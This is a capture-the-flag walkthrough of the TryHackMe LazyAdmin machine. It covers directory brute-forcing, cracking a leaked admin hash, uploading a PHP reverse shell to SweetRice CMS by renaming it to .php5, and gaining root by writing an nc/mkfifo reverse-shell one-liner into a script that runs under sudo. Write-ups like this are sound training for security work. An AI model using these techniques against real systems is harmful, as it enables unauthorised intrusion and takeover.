# CTF TryHackMe - LazyAdmin

## Nmap

```bash
nmap -sC -sV 10.10.158.208
Nmap scan report for 10.10.158.208
Host is up (0.091s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 49:7c:f7:41:10:43:73:da:2c:e6:38:95:86:f8:e0:f0 (RSA)
|   256 2f:d7:c4:4c:e8:1b:5a:90:44:df:c0:63:8c:72:ae:55 (ECDSA)
|_  256 61:84:62:27:c6:c3:29:17:dd:27:45:9e:29:cb:90:5e (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Mar 16 06:07:56 2021 -- 1 IP address (1 host up) scanned in 22.21 seconds
```

We discover 2 ports opens : 80 and 22

## Using Gobuster to bruteforce web directory

Launch gobuster on 10.10.154.165
```bash
gobuster dir -u http://10.10.154.165/ -w /usr/share/wordlists/dirb/big.txt
```
We discover only  **/content** directory

Launch again with this new directory
```bash
gobuster dir -u http://10.10.154.165/content -w /usr/share/wordlists/dirb/big.txt
```
We discover 3 directories :
* /as (login page)
* /inc (backup mysql)
* /attachment 

go on **http://10.10.154.165/content/inc/mysql_backup** and download the sql file

open sql file we found user and password
```
"Description\\";s:5:\\"admin\\";s:7:\\"manager\\";s:6:\\"passwd\\";s:32:\\"42f749ade7f9e195bf475f37a44cafcb\\"
```

go on crackstation to decode hash : **Password123**

## Using SearchSploit to check exploit on Sweetrice (cms which is on port 80)
```bash
searchspoit sweetrice
```
* SweetRice 1.5.1 - Arbitrary File Upload	php/webapps/40716.py

We analyze the script (he doesn't work for me so i decided do it manually)

## Exploit SweetRice to get RCE
go on http://10.10.154.165/content/as and connect with the credentials we discovered previously

```
manager:Password123
```

go on media center menu and upload php reverse shell (with php5 as extension to bypass filter)

go on http://10.10.158.208/content/attachment/ to activate the reverse shell

on kali machine, launch nc listener

```bash
nc -lvnp 1234
```

## Got a shell
got a shell as www-data

## Trying to elevate our priveleges

List sudo permissions
```bash
sudo -l 
(ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl
```
Inspect the file **backup.pl**
```bash
cat /home/itguy/backup.pl
```
He calls an another script **/etc/copy.sh**

We can write in **/etc/copy.sh**
Let's do a reverse shell in this file

```bash
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.9.188.66 9001 >/tmp/f" > /etc/copy.sh
```

Then, we need to launch the script to trigger **/etc/copy.sh**
```bash
sudo /usr/bin/perl /home/itguy/backup.pl
```

**Don't forget to lauch an nc listner** 
```bash
nc -lvnp 9001
```
and we'r root :D
